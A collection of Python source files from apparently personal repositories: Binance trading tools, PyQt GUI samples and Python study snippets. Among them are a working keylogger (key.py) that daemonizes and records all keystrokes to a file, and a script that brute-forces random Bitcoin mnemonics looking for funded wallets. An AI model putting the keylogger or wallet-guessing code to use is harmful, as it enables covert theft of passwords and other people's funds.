elif event == 'BTTN_BMM':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_MarginMarket(client, 'red', 'Sell Margin Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'B Margin Limit'
elif event == 'BTTN_BML':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_MarginLimit(client, 'green', 'Buy Margin Limit', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'B Margin Stop Limit'
elif event == 'BTTN_BMSL':
window.Hide()
ret, retMsg = CopyTrade_Manual_Util.BS_MarginStopLimit(client, 'green', 'Buy Margin Stop Limit', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
# 'B Margin OCO'
elif event == 'BTTN_BMO':
pass
# 'S Spot Market'
elif event == 'BTTN_SSM':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_SpotMarket(client, 'red', 'Sell Spot Market', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'S Spot Limit'
elif event == 'BTTN_SSL':
window.Hide()
ret, retMsg = CopyTrade_Manual_Util.BS_SpotLimit(client, 'red', 'Sell Spot Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
# 'S Spot Stop Limit'
elif event == 'BTTN_SSSL':
window.Hide()
ret, retMsg = CopyTrade_Manual_Util.BS_SpotStopLimit(client, 'red', 'Sell Spot Stop Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
# 'S Spot OCO'
elif event == 'BTTN_SSO':
pass
# 'S Margin Market'
elif event == 'BTTN_SMM':
window.Hide()
ret, retMsg = CopyTrade_Manual_Util.BS_MarginMarket(client, 'red', 'Sell Margin Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
# 'S Margin Limit'
elif event == 'BTTN_SML':
window.Hide()
ret, retMsg = CopyTrade_Manual_Util.BS_MarginLimit(client, 'red', 'Sell Margin Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
# 'S Margin Stop Limit'
elif event == 'BTTN_SMSL':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_MarginStopLimit(client, 'red', 'Sell Margin Stop Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'S Margin OCO'
elif event == 'BTTN_SMO':
pass
elif event == 'CANCEL':
pass
# 'LIST or DELETE Open Orders'
elif event == 'BTTN_LDOO':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.ListOpenOrders(client)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'LIST All':
pass
elif event == 'Infos binance':
pass
elif event == 'Assets':
pass
elif event == 'Symbols':
pass
window.close()
safeExit(0)
```
#### File: a2gs/BinanceCopyTrade/SrvDataClient.py
```python
from BinanceCTUtil import getTimeStamp
from sys import argv, exit, stderr
from os import getpid
from signal import signal, SIGILL, SIGTRAP, SIGINT, SIGHUP, SIGTERM, SIGSEGV, SIGUSR1
import BinanceCTDB
import socket
import envelop_sendRecv
import configparser
import logging
if len(argv) != 2:
print(f"Usage:\n\t{argv[0]} CFG_FILE.cfg")
exit(1)
con = None # Socket: signal source
srvDCDB = None # Database handle
def safeExit(num : int = 0, msg : str = ""):
if srvDCDB is not None:
srvDCDB.DB.commit()
srvDCDB.DB.quit()
if msg != "":
logging.debug(msg)
logging.debug(f"Exit with code [{num}]")
exit(num)
def sigHandler(signum, frame):
if signum == SIGUSR1:
logging.info('Singal SIGUSR1 received! Normal shutdown returning [0] to shell.\n')
logging.shutdown()
exit(0)
else:
logging.info(f'Singal {signum} received! Return [1] to shell.\n')
logging.shutdown()
exit(1)
signal(SIGILL , sigHandler)
signal(SIGTRAP, sigHandler)
signal(SIGINT , sigHandler)
signal(SIGHUP , sigHandler)
signal(SIGTERM, sigHandler)
signal(SIGSEGV, sigHandler)
signal(SIGUSR1, sigHandler)
# --- CFG ---------------------------------
try:
cfgFile = configparser.ConfigParser()
cfgFile.read(argv[1])
srvDataClient_name = cfgFile['GENERAL']['name']
srvDataClient_log = cfgFile['GENERAL']['log']
signalSrvDataClient_port = cfgFile['SIGNAL_SOURCE']['port']
signalSrvDataClient_address = cfgFile['SIGNAL_SOURCE']['address']
signalSrvDataClient_maxconn = cfgFile['SIGNAL_SOURCE']['maxconnections']
db_engine = cfgFile['DB']['engine']
if db_engine == BinanceCTDB.CT_DB_TYPE_SQLITE:
db_file = cfgFile['DB']['file']
elif db_engine == BinanceCTDB.CT_DB_TYPE_POSTGRESQL:
db_user = cfgFile['DB']['user']
db_pass = cfgFile['DB']['pass']
db_port = cfgFile['DB']['port']
db_schema = cfgFile['DB']['schema']
else:
print("Undefined DB engine config!", file=stderr)
exit(1)
except Exception as e:
print(f"Invalid cfg file! [{e}]")
exit(1)
del cfgFile
# --- LOG ---------------------------------
try:
logging.basicConfig(filename = srvDataClient_log,
level = logging.DEBUG,
format = '%(asctime)s %(message)s',
datefmt = '%Y%m%d %H%M%S')
except:
print(f"Erro open log file: [{pub_log}]", file=stderr)
exit(1)
# --- PRINT CFG ---------------------------
logging.info(f"Starting at: [{getTimeStamp()}] PID: [{getpid()}]")
logging.info('Configuration:')
logging.info(f"Name...................: [{srvDataClient_name}]")
logging.info(f"Address................: [{signalSrvDataClient_address}]")
logging.info(f"Port...................: [{signalSrvDataClient_port}]")
logging.info(f"Signal Source Port.....: [{signalSrvDataClient_port }]")
logging.info(f"Signal Source Address..: [{signalSrvDataClient_address }]")
logging.info(f"Signal Source Max Conns: [{signalSrvDataClient_maxconn }]")
logging.info(f"DB Engine..............: [{db_engine}]")
if db_engine == BinanceCTDB.CT_DB_TYPE_SQLITE:
logging.info(f"DB File................: [{db_file}]")
elif db_engine == BinanceCTDB.CT_DB_TYPE_POSTGRESQL:
logging.info(f"DB User................: [{db_user}]")
logging.info(f"DB Port................: [{db_port}]")
logging.info(f"DB Schema..............: [{db_schema}]")
# --- SOCKET ------------------------------
con = envelop_sendRecv.connection()
ret, retmsg = con.serverLoad(socket.AF_INET, socket.SOCK_STREAM)
if ret == False:
safeExit(1, f"Erro loading server: [{retmsg}]!")
ret, retmsg = con.sockOpts(socket.SO_REUSEADDR)
if ret == False:
safeExit(1, f"Erro sockOpts server: [{retmsg}]!")
ret, retmsg = con.serverBindListen(int(signalSrvDataClient_port), int(signalSrvDataClient_maxconn))
if ret == False:
safeExit(1, f"Erro binding server: [{retmsg}]!")
# --- DATABASE ----------------------------
srvDCDB = BinanceCTDB.CT_DB(_engine = db_engine, _sqliteDBFile = db_file)
ret, retmsg = srvDCDB.DB.connect()
if ret == False:
logging.info(f"Error opening database: [{retmsg}]")
exit(1)
ret, retmsg = srvDCDB.DB.createTablesIfNotExist()
if ret == False:
safeExit(1, f"Error creating tables: [{retmsg}]")
# -----------------------------------------
while True:
logging.info("Wating connection...")
ret, msgret, client = con.serverAccept()
if ret == False:
logging.info(f'Connection error: [{msgret}].')
exit(1)
ret, retmsg, msgRecv = con.recvMsg()
if ret == False:
logging.info(f"Error: [{retmsg}]")
exit(1)
logging.info(f'Connection from [{client}]. Msg: [{msgRecv}]')
respRet = "Ok"
con.sendMsg(respRet, len(respRet))
con.endClient()
logging.info("End Srv Data Client")
con.endServer()
``` |
{
"source": "a2gs/Binance_TrailingStop",
"score": 2
} |
#### File: a2gs/Binance_TrailingStop/TrailingStop.py
```python
from sys import exit, argv
from time import strftime, gmtime
from os import getenv
from binance.client import Client
from binance.exceptions import BinanceAPIException, BinanceWithdrawException, BinanceRequestException
class order_c:
_symb = str("")
_side = str("")
_qtd = int(0)
_priceLimit = float(0.0)
_priceTrigger = float(0.0)
_orderId = str("")
_type = int(0)
def __init__(self,
Psymb : str = "",
Pside : str = "",
Pqtd : int = 0,
PpriceLimit : float = 0.0,
PpriceTrigger : float = 0.0,
PorderId : str = "",
Ptype : str = ""):
self.symb = Psymb
self.side = Pside
self.qtd = Pqtd
self.priceLimit = PpriceLimit
self.priceTrigger = PpriceTrigger
self.orderId = PorderId
self.type = binanceOrderType[Ptype]
def print(self):
print(f"Symbol.......: [{self.symb}]")
print(f"Side.........: [{self.side}]")
print(f"Qtd..........: [{self.qtd}]")
print(f"Price Limit..: [{self.priceLimit}]")
print(f"Price Trigger: [{self.priceTrigger}]")
print(f"Id...........: [{self.orderId}]")
print(f"Type.........: [{self.type}]")
@property
def symb(self) -> str:
return self._symb
@symb.setter
def symb(self, value : str = ""):
self._symb = value
@property
def side(self) -> str:
return self._side
@side.setter
def side(self, value : str = ""):
self._side = value
@property
def qtd(self):
return self._qtd
@qtd.setter
def qtd(self, value : int = 0):
self._qtd = value
@property
def priceLimit(self):
return self._priceLimit
@priceLimit.setter
def priceLimit(self, value : int = 0):
self._priceLimit = value
@property
def priceTrigger(self):
return self._priceTrigger
@priceTrigger.setter
def priceTrigger(self, value : int = 0):
self._priceTrigger = value
@property
def orderId(self):
return self._orderId
@orderId.setter
def orderId(self, value : str = ""):
self._orderId = value
@property
def type(self):
return self._type
@type.setter
def type(self, value : str = ""):
try:
self._type = binanceOrderType[value]
except:
self._type = ""
binanceOrderType = {
'LIMIT' : Client.ORDER_TYPE_LIMIT,
'LIMIT_MAKER' : Client.ORDER_TYPE_LIMIT_MAKER,
#'MARKET' : Client.ORDER_TYPE_MARKET,
'STOP_LOSS' : Client.ORDER_TYPE_STOP_LOSS,
'STOP_LOSS_LIMIT' : Client.ORDER_TYPE_STOP_LOSS_LIMIT,
'TAKE_PROFIT' : Client.ORDER_TYPE_TAKE_PROFIT,
'TAKE_PROFIT_LIMIT' : Client.ORDER_TYPE_TAKE_PROFIT_LIMIT
}
def printHelp():
print("0) ENVIRONMENT VARIABLES:")
print("BINANCE_APIKEY - ")
print("BINANCE_SEKKEY - ")
print("")
print("1) PLACE A NEW ORDER AND TRAILING STOP (-n):")
print("./TrailingStop -n SYMBOL SIDE PRICE_LIMIT QTD_LIMIT PRICE_REFRESH_SECONDS TRIGGER_PERCENTAGE(Stop price) NEW_POSITION_PERCENTAGE(Limit price)")
print("SYMBOL")
print("SIDE - SELL / BUY")
print("PRICE_LIMIT")
print("QTD_LIMIT")
print("PRICE_REFRESH_SECONDS")
print("TRIGGER_PERCENTAGE - How much distance from placed order to current price to replace the order")
print("NEW_POSITION_PERCENTAGE - How much from current price to replace the new order")
print("")
print("./TrailingStop -n BTCUSDT BUY 10000 2 3 10 4")
print("")
print("2) TRAILING STOP FOR AN EXISTING ORDER:")
print("./TrailingStop -f ORDERE_ID PRICE_REFRESH_SECONDS TRIGGER_PERCENTAGE NEW_POSITION_PERCENTAGE")
print("")
print("3) LIST ALL ORDERS INFORMATION:")
print("./TrailingStop -i")
print("")
print("4) CANCEL AN ORDER:")
print("./TrailingStop -c ORDER_SYMBOL ORDER_ID")
print("")
print("5) SYMBOL LAST PRICE:")
print("./TrailingStop -p SYMBOL")
def milliTime(t):
return(strftime(f"%d/%b/%Y %a %H:%M:%S.{t % 1000}", gmtime(t / 1000)))
def printOrders(spotOrder):
print(f"Symbol: [{spotOrder['symbol']}]")
print(f"\tOrder Id: [{spotOrder['orderId']}] | Time: [{milliTime(spotOrder['time'])}]")
print(f"\tSide: [{spotOrder['side']}] | Type: [{spotOrder['type']}]")
print(f"\tQtd: [{spotOrder['origQty']}] | Qtd executed: [{spotOrder['executedQty']}]")
print(f"\tPrice (limit): [{spotOrder['price']}] | Stop price (trigger): [{spotOrder['stopPrice']}]")
def listOpenOrders(client) -> bool:
try:
openOrders = client.get_open_orders() #recvWindow
except BinanceRequestException as e:
print(f"Erro at client.get_open_orders() BinanceRequestException: [{e.status_code} - {e.message}]")
return False
except BinanceAPIException as e:
print(f"Erro at client.get_open_orders() BinanceAPIException: [{e.status_code} - {e.message}]")
return False
except Exception as e:
print("Erro at client.get_open_orders(): {e}")
return False
print(f"Spot open orders ({len(openOrders)}):")
[printOrders(i) for i in openOrders]
print("")
try:
openOrders = client.get_open_margin_orders()
except BinanceRequestException as e:
print(f"Erro at client.get_open_margin_orders() BinanceRequestException: [{e.status_code} - {e.message}]")
return False
except BinanceAPIException as e:
print(f"Erro at client.get_open_margin_orders() BinanceAPIException: [{e.status_code} - {e.message}]")
return False
except Exception as e:
print("Erro at client.get_open_margin_orders(): {e}")
return False
print(f"Margin open orders ({len(openOrders)}):")
[printOrders(i) for i in openOrders]
return True
def cancelOrder(client, idOrder : int, symb : str) -> bool:
try:
cancOrd = client.cancel_order(symbol = symb, orderId = idOrder)
except BinanceRequestException as e:
print(f"Erro at client.cancel_order() BinanceRequestException: [{e.status_code} - {e.message}]")
return False
except BinanceAPIException as e:
print(f"Erro at client.cancel_order() BinanceAPIException: [{e.status_code} - {e.message}]")
return False
except Exception as e:
print("Erro at client.cancel_order(): {e}")
return False
print("Canceled order:")
print(f"Symbol: [{cancOrd['symbol']}]")
print(f"\tOrder Id.............: [{cancOrd['orderId']}]")
print(f"\tPrice................: [{cancOrd['price']}]")
print(f"\tOriginal Qtd.........: [{cancOrd['origQty']}]")
print(f"\tExecuted Qty.........: [{cancOrd['executedQty']}]")
print(f"\tCummulative Quote Qty: [{cancOrd['cummulativeQuoteQty']}]")
print(f"\tStatus...............: [{cancOrd['status']}]")
print(f"\tType.................: [{cancOrd['type']}]")
print(f"\tSide.................: [{cancOrd['side']}]")
return True
def TS(client, order : order_c) -> bool:
#order.print()
return True
#def getOrderInfo(client, symb : str, orderid : int) -> (bool, order_c):
def getOrderInfo(client, orderid : int) -> (bool, order_c):
try:
# o = client.get_all_orders(symbol = "*", orderId = orderid, limit = 1)
o = client.get_open_margin_orders() #recvWindow
except BinanceAPIException as e:
print(f"Erro at client.get_all_orders() BinanceAPIException: [{e.status_code} - {e.message}]")
return (False, None)
except BinanceRequestException as e:
print(f"Erro at client.get_all_orders() BinanceRequestException: [{e.status_code} - {e.message}]")
return (False, None)
except Exception as e:
print("Erro at client.get_all_orders(): {e}")
return (False, None)
if len(o) != 1:
return (False, None)
oa = next((item for item in o if item['orderId'] == orderid), None)
order = order_c(oa['symbol'], oa['side'], oa['origQty'], oa['price'], oa['orderId'], oa['type'])
return (True, order)
def TS_createOrder(client, symb, side, priceLimit, qtdLimit, priceRefreshSeconds, triggerPercent, newPositPercent) -> bool:
order = order_c()
if TS(client, order) == False:
return False
def TS_existingOrder(client, orderId : int, priceRefreshSeconds, triggerPercent, newPositPercent) -> bool:
(retORderInfo, order) = getOrderInfo(client, orderId)
order.print()
if TS(client, order) == False:
return False
def printPrice(client, symb : str) -> bool:
try:
pa = client.get_ticker(symbol = symb)
except BinanceAPIException as e:
print(f"Erro at client.get_avg_price() BinanceAPIException: [{e.status_code} - {e.message}]")
return False
except BinanceRequestException as e:
print(f"Erro at client.get_avg_price() BinanceRequestException: [{e.status_code} - {e.message}]")
return False
except Exception as e:
print("Erro at client.get_avg_price(): {e}")
return False
print(f"Symbol: [{symb}] | Price.: [{pa['lastPrice']}]")
return True
# APIs:
# order_limit_sell()
binanceAPIKey = getenv("BINANCE_APIKEY", "NOTDEF_APIKEY")
if binanceAPIKey == "NOTDEF_APIKEY":
print("Environment variable BINANCE_APIKEY not defined!")
exit(1)
binanceSEKKey = getenv("BINANCE_SEKKEY", "NOTDEF_APIKEY")
if binanceSEKKey == "NOTDEF_APIKEY":
print("Environment variable BINANCE_SEKKEY not defined!")
exit(1)
try:
client = Client(binanceAPIKey, binanceSEKKey, {"verify": True, "timeout": 20})
except BinanceAPIException as e:
print(f"Binance API exception: [{e.status_code} - {e.message}]")
exit(1)
except BinanceRequestException as e:
print(f"Binance request exception: [{e.status_code} - {e.message}]")
exit(1)
except BinanceWithdrawException as e:
print(f"Binance withdraw exception: [{e.status_code} - {e.message}]")
exit(1)
except Exception as e:
print("Binance connection error: {e}")
exit(1)
if len(argv) >= 2:
if argv[1] == '-n' and len(argv) == 9:
TS_createOrder(client, argv[2], argv[3], argv[4], argv[5], argv[6], argv[7], argv[8])
elif argv[1] == '-f' and len(argv) == 6:
TS_existingOrder(client, int(argv[2]), argv[3], argv[4], argv[5])
elif argv[1] == '-i' and len(argv) == 2:
listOpenOrders(client)
elif argv[1] == '-c' and len(argv) == 4:
cancelOrder(client, int(argv[2]), argv[3])
elif argv[1] == '-p' and len(argv) == 3:
printPrice(client, argv[2])
else:
print("Parameters error.")
printHelp()
else:
printHelp()
``` |
{
"source": "a2gs/BTCWalletDigger",
"score": 3
} |
#### File: a2gs/BTCWalletDigger/digger.py
```python
from sys import exit
from bitcoinlib.wallets import HDWallet, wallet_delete
from bitcoinlib.mnemonic import Mnemonic
def main(argv):
if (len(argv) == 2 and argv[1] == '-h') or (len(argv) == 1):
print('Usage:')
print(f'{argv[0]} -h\n\tHelp')
print(f'{argv[0]} -w <TYPE>\n\tWitness type. One of: \'p2sh-segwit\', \'segwit\' or \'legacy\' (default if -w not defined)')
print(f'{argv[0]} -k <SIZE>\n\tKey size. One of: \'128\' (default if -k not defined. 12 words), \'256\' (24 words), \'512\' or \'1024\'')
exit(0)
if '-w' in argv:
try:
witnesstype = argv[argv.index('-w') + 1]
except IndexError:
print(f'Witness value error: -w without value defined')
exit(0)
if witnesstype not in ['p2sh-segwit', 'segwit', 'legacy']:
print(f'Witness tpye error: Unknow {witnesstype}')
exit(0)
else:
witnesstype = 'p2sh-segwit'
if '-k' in argv:
try:
keysize = int(argv[argv.index('-k') + 1])
except IndexError:
print(f'Key size error: -k without value defined')
exit(0)
if keysize not in [128, 256, 512, 1024]:
print(f'Key size error: Unknow {keysize}')
exit(0)
else:
keysize = 256
walletname = "Wallet_Test"
print(f'Configuration: witness type: [{witnesstype}] and key size: [{keysize}] (wallet name: {walletname})')
passphrase = Mnemonic().generate(strength=keysize)
w = HDWallet.create(walletname, keys=passphrase, witness_type=witnesstype, network='bitcoin')
w.scan()
balance = w.balance_update_from_serviceprovider()
print(f'Passphrase: [{passphrase}] Balance: [{balance}]')
if(balance == 0):
wallet_delete(walletname)
else:
print(f'Wallet [{walletname}] NOT DELETED from DATABASE!')
if __name__ == '__main__':
main(sys.argv)
exit(0)
``` |
{
"source": "a2gs/keylogger",
"score": 3
} |
#### File: a2gs/keylogger/key.py
```python
from os import fork, umask, setsid, chdir
from sys import exit
from pynput.keyboard import Key, Listener
kbuf = ""
def d():
if fork() > 0:
exit(0)
chdir('./')
setsid()
umask(0)
def kp(k):
global kbuf
if k == Key.enter:
kbuf += ' ENTER\n'
wl()
elif k == Key.space:
kbuf += ' '
wl()
elif k == Key.esc:
kbuf += ' ESC\n'
wl()
elif k == Key.backspace:
kbuf += ' BACKSPACE\n'
wl()
elif k == Key.caps_lock:
kbuf += ' CAPSLOCK\n'
wl()
elif k == Key.ctrl or k == Key.ctrl_l:
kbuf += ' L_CTRL\n'
wl()
elif k == Key.ctrl_r:
kbuf += ' R_CTRL\n'
wl()
elif k == Key.alt or k == Key.alt_l:
kbuf += ' L_ALT\n'
wl()
elif k == Key.alt_r or k == Key.alt_gr:
kbuf += ' R_ALT\n'
wl()
elif k == Key.delete:
kbuf += ' DEL\n'
wl()
elif k == Key.down:
kbuf += ' DOWN\n'
wl()
elif k == Key.end:
kbuf += ' END\n'
wl()
elif k == Key.home:
kbuf += ' HOME\n'
wl()
elif k == Key.left:
kbuf += ' LEFT\n'
wl()
elif k == Key.page_down:
kbuf += ' P_DOWN\n'
wl()
elif k == Key.page_up:
kbuf += ' P_UP\n'
wl()
elif k == Key.right:
kbuf += ' RIGHT\n'
wl()
elif k == Key.shift or k == Key.shift_l:
kbuf += ' L_SHIFT\n'
wl()
elif k == Key.shift_r:
kbuf += ' R_SHIFT\n'
wl()
elif k == Key.tab:
kbuf += ' TAB\n'
wl()
elif k == Key.up:
kbuf += ' UP\n'
wl()
elif k == Key.insert:
kbuf += ' INSERT\n'
wl()
elif k == Key.menu:
kbuf += ' MENU\n'
wl()
elif k == Key.num_lock:
kbuf += ' NUMLOCK\n'
wl()
elif k == Key.pause:
kbuf += ' PAUSE\n'
wl()
elif k == Key.print_screen:
kbuf += ' SYSRQ\n'
wl()
elif k == Key.scroll_lock:
kbuf += ' SCROLLLOCK\n'
wl()
elif k == Key.f1:
kbuf += ' F1\n'
wl()
elif k == Key.f2:
kbuf += ' F2\n'
wl()
elif k == Key.f3:
kbuf += ' F3\n'
wl()
elif k == Key.f4:
kbuf += ' F4\n'
wl()
elif k == Key.f5:
kbuf += ' F5\n'
wl()
elif k == Key.f6:
kbuf += ' F6\n'
wl()
elif k == Key.f7:
kbuf += ' F7\n'
wl()
elif k == Key.f8:
kbuf += ' F8\n'
wl()
elif k == Key.f9:
kbuf += ' F9\n'
wl()
elif k == Key.f10:
kbuf += ' F10\n'
wl()
elif k == Key.f11:
kbuf += ' F11\n'
wl()
elif k == Key.f12:
kbuf += ' F12\n'
wl()
elif k == Key.f13:
kbuf += ' F13\n'
wl()
elif k == Key.f14:
kbuf += ' F14\n'
wl()
elif k == Key.f15:
kbuf += ' F15\n'
wl()
elif k == Key.f16:
kbuf += ' F16\n'
wl()
elif k == Key.f17:
kbuf += ' F17\n'
wl()
elif k == Key.f18:
kbuf += ' F18\n'
wl()
elif k == Key.f19:
kbuf += ' F19\n'
wl()
elif k == Key.f20:
kbuf += ' F20\n'
wl()
elif k == Key.cmd or k == Key.cmd_l:
kbuf += ' L_META\n'
wl()
elif k == Key.cmd_r:
kbuf += ' R_META\n'
wl()
elif k == Key.media_play_pause:
kbuf += ' PLAYPAUSE\n'
wl()
elif k == Key.media_volume_mute:
kbuf += ' MUTE\n'
wl()
elif k == Key.media_volume_down:
kbuf += ' VOLDOWN\n'
wl()
elif k == Key.media_volume_up:
kbuf += ' VOLUP\n'
wl()
elif k == Key.media_previous:
kbuf += ' PREVSONG\n'
wl()
elif k == Key.media_next:
kbuf += ' NEXTSONG\n'
wl()
else:
try:
kbuf += k.char
except:
pass
def wl():
global kbuf
f = open('log.txt', 'a')
f.write(kbuf)
f.close()
kbuf = ""
d()
with Listener(on_press = kp) as listener:
listener.join()
``` |
{
"source": "a2gs/PyQT",
"score": 3
} |
#### File: a2gs/PyQT/box-layout.py
```python
from PyQt5.QtWidgets import (QApplication, QComboBox, QDialog, QDialogButtonBox, QFormLayout, QGridLayout, QGroupBox, QHBoxLayout, QLabel, QLineEdit, QMenu, QMenuBar, QPushButton, QSpinBox, QTextEdit, QVBoxLayout)
import sys
class Dialog(QDialog):
# NumGridRows = 3
# NumButtons = 4
def __init__(self):
super(Dialog, self).__init__()
b1=QPushButton("Button1")
b2=QPushButton("Button2")
b3=QPushButton("Button3")
b4=QPushButton("Button4")
mainLayout = QVBoxLayout()
mainLayout.addWidget(b1)
mainLayout.addWidget(b2)
mainLayout.addWidget(b3)
mainLayout.addWidget(b4)
self.setLayout(mainLayout)
self.setWindowTitle("Form Layout - pythonspot.com")
if __name__ == '__main__':
app = QApplication(sys.argv)
dialog = Dialog()
sys.exit(dialog.exec_())
```
#### File: a2gs/PyQT/colors.py
```python
import sys
from PyQt5.QtWidgets import QApplication, QWidget, QMainWindow, QLabel
from PyQt5.QtGui import QPainter, QColor, QPen
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import Qt
import random
class App(QMainWindow):
def __init__(self):
super().__init__()
self.title = 'PyQt rectangle colors - pythonspot.com'
self.left = 10
self.top = 10
self.width = 440
self.height = 280
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
# Set window background color
self.setAutoFillBackground(True)
p = self.palette()
p.setColor(self.backgroundRole(), Qt.white)
self.setPalette(p)
# Add paint widget and paint
self.m = PaintWidget(self)
self.m.move(0,0)
self.m.resize(self.width,self.height)
self.show()
class PaintWidget(QWidget):
def paintEvent(self, event):
qp = QPainter(self)
qp.setPen(Qt.black)
size = self.size()
# Colored rectangles
qp.setBrush(QColor(200, 0, 0))
qp.drawRect(0, 0, 100, 100)
qp.setBrush(QColor(0, 200, 0))
qp.drawRect(100, 0, 100, 100)
qp.setBrush(QColor(0, 0, 200))
qp.drawRect(200, 0, 100, 100)
# Color Effect
for i in range(0,100):
qp.setBrush(QColor(i*10, 0, 0))
qp.drawRect(10*i, 100, 10, 32)
qp.setBrush(QColor(i*10, i*10, 0))
qp.drawRect(10*i, 100+32, 10, 32)
qp.setBrush(QColor(i*2, i*10, i*1))
qp.drawRect(10*i, 100+64, 10, 32)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_())
```
#### File: a2gs/PyQT/spacing.py
```python
import sys
from PyQt5.QtWidgets import QApplication, QCheckBox, QTabWidget, QVBoxLayout, QWidget, QFormLayout, QLineEdit, QLabel
class Window(QWidget):
def __init__(self):
super().__init__()
self.setWindowTitle("QFormLayout Example")
self.resize(270, 110)
# Create a QHBoxLayout instance
layout = QFormLayout()
# Add widgets to the layout
layout.setVerticalSpacing(30)
layout.addRow("Name:", QLineEdit())
layout.addRow("Job:", QLineEdit())
emailLabel = QLabel("Email:")
layout.addRow(emailLabel, QLineEdit())
# Set the layout on the application's window
self.setLayout(layout)
if __name__ == "__main__":
app = QApplication(sys.argv)
window = Window()
window.show()
sys.exit(app.exec_())
```
#### File: a2gs/PyQT/window.py
```python
import sys
from PyQt5.QtWidgets import QApplication, QWidget
from PyQt5.QtGui import QIcon
class App(QWidget):
def __init__(self):
super().__init__()
self.title = 'PyQt5 simple window - pythonspot.com'
self.left = 10
self.top = 10
self.width = 640
self.height = 480
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
self.show()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_())
``` |
{
"source": "a2gs/pythonStudy",
"score": 3
} |
#### File: a2gs/pythonStudy/cProfile_and_timeit_sample.py
```python
import cProfile
import timeit
def func(x):
print(f"Hello {x:d}")
numbers = []
start = 0
for i in range(x):
print(i)
numbers.append(i)
cProfile.run('func(100000)')
#Or: print(timeit.timeit('func(100000)', globals=globals(), number=1))
print(timeit.timeit('func(100000)', setup="from __main__ import func", number=1))
```
#### File: pythonStudy/decorator/dec2_simple_decorator.py
```python
def my_decorator(func):
def wrapper():
print("Something is happening before the function is called.")
func()
print("Something is happening after the function is called.")
return wrapper
@my_decorator
def say_whee():
print("Whee!")
say_whee()
```
#### File: pythonStudy/decorator/dec4_return.py
```python
from decorators import do_twice, do_something_and_return_a_value
@do_something_and_return_a_value
def greet(name):
"""
function greet() inside dec4 sample
"""
print(f"Hello {name}")
return 42
str = greet("World")
print(str)
print(f"\n---(continues to dec5)-------------\nFunc name: {greet.__name__}")
print("help(greep) output (is not, help() output from decorator): ")
help(greet)
```
#### File: pythonStudy/decorator/dec5_functools.py
```python
from decorators import do_something_functools
@do_something_functools
def greet(name):
"""
function greet() inside dec5 sample
"""
print(f"Hello {name}")
return 42
str = greet("World")
print(str)
print(f"\n---(functools facility)-------------\nFunc name: {greet.__name__}")
print("help(greet) output: ")
help(greet)
```
#### File: pythonStudy/decorator/full_sample_timer.py
```python
from decorators import timer
@timer
def waste_some_time(num_times):
for _ in range(num_times):
sum([i**2 for i in range(10000)])
waste_some_time(1)
waste_some_time(999)
```
#### File: a2gs/pythonStudy/exception.py
```python
class myBaseException(Exception):
def __init__(self, errNum, errMsg):
self.err = errNum
self.msg = errMsg
class myExcept_1(myBaseException):
def __init__(self):
super().__init__(13, "except 1")
class myExcept_2(myBaseException):
def __init__(self):
super().__init__(8, "except 2")
def func(b):
if(b == 1):
raise myExcept_1
elif(b == 2):
raise myExcept_2
elif(b == 3):
return
try:
func(1)
except myExcept_1 as e:
print(f'Erro number: {e.err} message: {e.msg}')
except myExcept_2 as e:
print(f'Erro number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
print('Done1\n----------------------------------------')
try:
func(2)
except myExcept_1 as e:
print(f'Erro number: {e.err} message: {e.msg}')
except myExcept_2 as e:
print(f'Erro number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
print('Done2\n----------------------------------------')
try:
func(3)
except myExcept_1 as e:
print(f'Erro number: {e.err} message: {e.msg}')
except myExcept_2 as e:
print(f'Erro number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
```
#### File: a2gs/pythonStudy/iterator.py
```python
class myIter:
def __init__(self, max = 0):
self.max = max
def __iter__(self):
self.n = 0
return self
def __next__(self):
if self.n <= self.max:
result = 2 ** self.n
self.n += 1
return result
else:
raise StopIteration
print('------')
for i in myIter(5):
print(i)
print('------\nITER()')
m = myIter(7)
mi = iter(m)
for i in range(10):
print(next(mi))
```
#### File: a2gs/pythonStudy/main.py
```python
import main2
import module111
from module222.m222func import m2func
import module222 #just for 'print(module222.__doc__)' line
class sample():
def __init__(self, _x = 0, _y = ''):
self.xxx = _x
self.yyy = _y
def _get_x(self):
return self.xxx
def _get_y(self):
return self.yyy
def _set_x(self, _x = 0):
self.xxx = _x
def _set_y(self, _y = ''):
self.yyy = _y
x = property(_get_x, _set_x)
y = property(_get_y, _set_y)
def main():
print('0 ----------------')
a = sample()
b = sample()
c = sample(10, 'abc')
print('1 ----------------')
b.x = 13
b.y = 'xyz'
